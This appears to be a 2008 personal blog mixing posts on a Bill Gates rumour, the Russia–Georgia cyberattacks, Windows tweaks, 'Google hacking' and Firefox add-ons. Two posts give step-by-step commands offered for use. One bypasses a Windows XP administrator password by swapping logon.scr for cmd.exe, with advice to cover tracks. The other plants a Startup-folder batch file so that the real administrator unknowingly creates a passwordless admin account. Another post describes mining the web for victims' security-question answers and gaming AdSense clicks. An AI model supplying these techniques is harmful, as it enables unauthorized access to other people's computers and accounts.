Friday, August 29, 2008

MICROSOFT product ..without any bugs ??

Hellozz.. friends I have received a mail from my friend saying the above picture is of Bill gates's daughter. You all must be very curious of the above statement and some of you might be familiar with this photo recently.
I had actually do some research and surfing online to find out the truth.


I got a link (http://www.nndb.com/people/435/000022369/), i came to know that gate's eldest daughter was just 12 years old! and her name is Jennifer Katherine and was born on 26-Apr-1996.When gates had married he was 39 years old .

Bill Gates children is:

* Jennifer Katharine Gates, his daughter born in 1996
* Rory John Gates, his son born in 1999
* Phoebe Adele Gates, his daughter born in 2002

Now question rounding in my mind is who is this girl........?

If anybody knows just write a reply in my blog....:)


read more...

Thursday, August 21, 2008

The Cyberspace War

AS the violence unfolded between Russia and Georgia during the past week, hackers waged war on another front: the Internet.
The Georgian government
accused Russia of engaging in cyberwarfare by disabling many government Web sites, making it difficult to inform citizens quickly of important updates.
Russia said : it was not involved and that its own media and official Web sites had suffered similar attacks. although a cease-fire has been ordered, major Georgian servers are still down, hindering communication in the country.
Some Georgian officials, bloggers and citizens
were able to work around the disruptions,
sending text messages to friends in other countries using web sites hosted by US servers that are less likely to fall victim to a cyberattack

http://www.wowmails.com


Concerted online attacks have been a threat for years.
But security experts say the
"cyberwar" between Russia and Georgia underscores the havoc that can spread on a digital battlefield. It also highlights how vulnerable Web-reliant countries are to assaults that could cripple military communications or a national banking industry.

http://www.wowmails.com

The attacks against Georgia's Internet infrastructure began nearly two months before the first shots were fired, according to security researchers who track Internet traffic into and out of the countries. Such attacks, known as "denial of service" attacks, are triggered when computers in a network are simultaneously ordered to bombard a site with millions of requests, which overloads a server and causes it to shut down.

http://www.wowmails.com

"In terms of the scope and international dimension of this attack, it's a landmark," said Ronald Deibert, director of the University of Toronto's Citizen Lab, which has nearly 100 researchers mapping Web traffic through several countries, including Russia and Georgia. He said smallscale attacks have occurred between the countries since June.
"International laws are very poorly developed, so it really crosses a line into murky territory .. Is an information blockade an act of war ?"

http://www.wowmails.com

Cyberattacks can be launched cheaply and easily, with a few hundred computers and a couple of skilled hackers.Simpler tactics are even easier to mount by hacking into a server and deleting files, reconfiguring settings and altering photos. Compared with expensive military attacks, cyberwar tactics "seems like the kind of thing that a sophisticated military would want experiment with ," said Ben Edelman, assistant professor at Harvard Business School who has studied cyberattacks.

http://www.wowmails.com

"Imagine how devastating it would be to a military commander
to lose access to a server that tells him where his troops are stationed and where he has resources," he said, adding that "this is the first time we've had such strong evidence of cyberwarfare. "
Instructions on how to mount such attacks are readily available on blogs, making it easy for a grass-roots effort to quickly escalate into a crippling assault.
Figuring out who is behind the attacks has been difficult, Deibert said, because of complex routing methods and a multitude of connection exchanges. The Internet's infrastructure is a maze of lines laid by different service providers traversing many countries, masking how information is traveling — or blocked. 'It's an ongoing battle in documenting where it's coming from and helping people get around it," he said.

http://www.wowmails.com

In Georgia, which is not as dependent on the Internet as other nations, the cyberattack mainly hindered the government's ability to communicate with its citizens and others during the fighting. The Georgian Foreign Ministry's Web site, for example, was disabled except for a collage that compared Georgian president Mikhail Saakashvili with Adolf Hitler.
To get around the blockade, Georgian officials relocated national Web sites to addresses hosted by Google's Blogspot, whose US servers are more immune to attack. Citizens used blogging platforms such as LiveJournal — the dominant platform in Russia and Georgia — to post their own reactions during the fighting.
For example, a Georgian refugee from Abkhazia who blogs under the name Cyxymu on LiveJournal, posted photos of Russian troops entering the Georgian town of Gori.
The blogger said the photos were taken after Russia had announced its withdrawal,
proving, he said, that fighting continued.

http://www.wowmails.com

Morozov said only a few hundred Georgians used blogs to communicate with people outside the country. Even that tool was threatened, he said, when a group of Russian bloggers sent a letter to Sup, the Russian company that owns and manages LiveJournal,
to censor posts with pro- Georgian sentiment. Sup did not comply. The cyberwar will most likely serve as a Web security wake-up call, Morozov said."Georgia was completely unprepared to the fact that all this information was on the Internet," he said. "I think it taught them — and a lot of people — a lesson."
read more...

Sunday, August 17, 2008

WHO THE HELL IS SHE ????

India celebrated 61 independence day and we are thrilled that India grown up and so peoples,
But...these pictures I got through mail shows the gross disrespect and insult to the Indian National flag by this so called 'spiritual leader' and self proclaimed 'GOD' Mataji Nirmala Devi. this disrespect to our country's flag shows that she has definitely no respect or love for the country that gave her so much and her husband who was an IAS officer and chief of the SCI (he is seated next to her in he pics)... such as shame.






Is really India grown up ?????????
read more...

Saturday, August 9, 2008

Windows Process Information

Yesterday, my friend Anna was asking me about process and want to know that which process window need and which are unnecessary.I found a intresting site which help to solve this problem.
When pressing Ctrl+Alt+Delete on your computer you’ll get the task manager. In the task manager you can find a lot of valuable information such as: which applications and process are running at the moment, your pc performances, some info about your network activities and the current user which is logged on the computer.
When looking at the process tab in your task manager you’ll find that there are a lot of processes on your computer which are running. Some of them speak for them selfs such as: Photoshop.exe (which means that Photoshop is running), FireFox.exe (which means that FireFox is running) and you’ll also see some process which you didn’t start or know about. Processes like alg.exe, svchost.exe, ccapp.exe, ctfmon.exe etc..
There might also be a process of a program which you have installed with the autorun function (So it starts each time you turn your computer on!). Here’s what I do in this situation, depending on which program it is and if I NEED it, I’ll make sure that this doesn’t run when I turn my computer on.
I find the information in the process tab very handy cause I want to know what my pc is up to and which process are running at the moment. There are process which can be stopped simply because you don’t need/use them. Some of them can’t/shouldn’t be stopped because Windows XP needs them!!
By disabling the unnecessary process and the autorun programs you can gain more CPU & RAM resources and you’ll also notice that you’r computer is starting up more quickly.
So if you need to find more information about the process which are running on your pc and which you don’t know about, you can visit File.net.
On File.net you can find some background information about the process, which program uses that process, what it’s good for and how you can remove/stop the process.
So be in control of your computer and decide which programs may run on your computer.
read more...

Friday, August 8, 2008

WINDOWS TIPS COLLECTION

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"
Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

Create a Shortcut to Lock Your Computer


Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.


read more...

Hacking with Google, Is it Possible

hello friend i got this stuff during surfing and i found it intresting.......

Every hacker needs to develop his abilities if he wants to maintain up to date. That's why he will use every tool he can find. From all of these possible options, Google hacks have become a new instrument for hackers. Although Google hacking isn't widespread knowledge, it should be understood by any hacker and even for the everyday computer user.

But, if you want to become a hacker, Google is the way to go. Learn how to hack Google and you will acquire a powerful tool for your everyday work.

What Is Google Hacking?

Basically, it's the ability to use Google for finding hidden bits of data or information that the hacker can use for his advantage. Or in other words, hacking Google search appliance. How so? Let's say that you are a black hacker (someone who uses his hacking abilities for selfish purposes) and want to access the email account of a chosen victim. The first thing that hacker's do is to find out what is the secret question in the email account of their prey. Let's say that the secret question asks the name of the pet of the account owner. How can the hacker learn it?

Besides asking the pet's name to his victim (which is very suspicious), it's probable that that bit of information is lost somewhere in the internet. Maybe the owner went into a forum regarding pet insurance and left inside the name of his dog. These are the kind of things that Google permits to find.

Another common use is to hack Google adsense click. That way your webpage will have a higher position when a related query is made through Google. After all, more clicks means more money for you.

How Is It Done?

If you want to make a typical search in Google, let's say, house insurance, you only need to put those words in the query bar and press the search button. In the case of a Google hacker, he will use special characters that the common user doesn't use or doesn't even considered using. For example: +, /, and -.

Each one of these characters are used for special purposes. For example, if you use the minus sign just before a determined word, like dog, Google will only show those searches were the word dog doesn't appear.

One of best places for finding a how to hack with Google tutorial is the Google Hacking database, posted online by the hacker Johnny Long. In this webpage, you will notice hundreds of ways of using Google for exploiting the weak points of servers and webpages.
read more...

Sunday, August 3, 2008

Create Administrator Account using Guest Account

I was wondering if this was possible. and oh yes it is possible. but the PC in which you want to create an admin account, an administrator who logs on regularly must be present. ( I mean someone with an administrator account must log in ) This process can be divided in to .... lets say about 5 steps. and here are the cools 5 steps to create your own admin account:


1. Right click desktop NEW> Text Document


2.Write the following in the notepad
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

3.save the file and rename it to what ever you want with the extention .bat


4.Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
5.The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.
Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.
Hope this helped someone who needs an admin a/C.
read more...

Firefox Addons FIRE


Most of firefox fans are aware of awesomeness of Mozilla Firefox 3 address bar but few are aware that this awesome bar can be upgraded by using some Firefox addons and can be made more useful.

Here is the list of 5 Firefox 3 addons which can improve the working and efficiency of your Mozilla Firefox 3 address bar.

1.oldbar - Oldbar makes the location (URL) bar look like Firefox 2. If you need another alternative to this, try out Old Location Bar. Oldbar just makes the location bar look like FireFox 2 Old Location Bar makes it ACT like Firefox 2.
2.Hide Unvisited - You too can hide pages bookmarks that you haven't visited , since deleting or clearing history, from showing in the Address Bar.
3.Enter Selects - This Extension allows you to press enter in the Address Bar to select the first result without pressing down.
4.Hidden Places - Stop URLs from specified domains being added to places and the Address Bar.
5.Edit Middle - Show AwesomeBar results when editing in the middle not just at the end.
I personally feel that even without addons firefox 3 is a nice and safe web browser compared to others.
read more...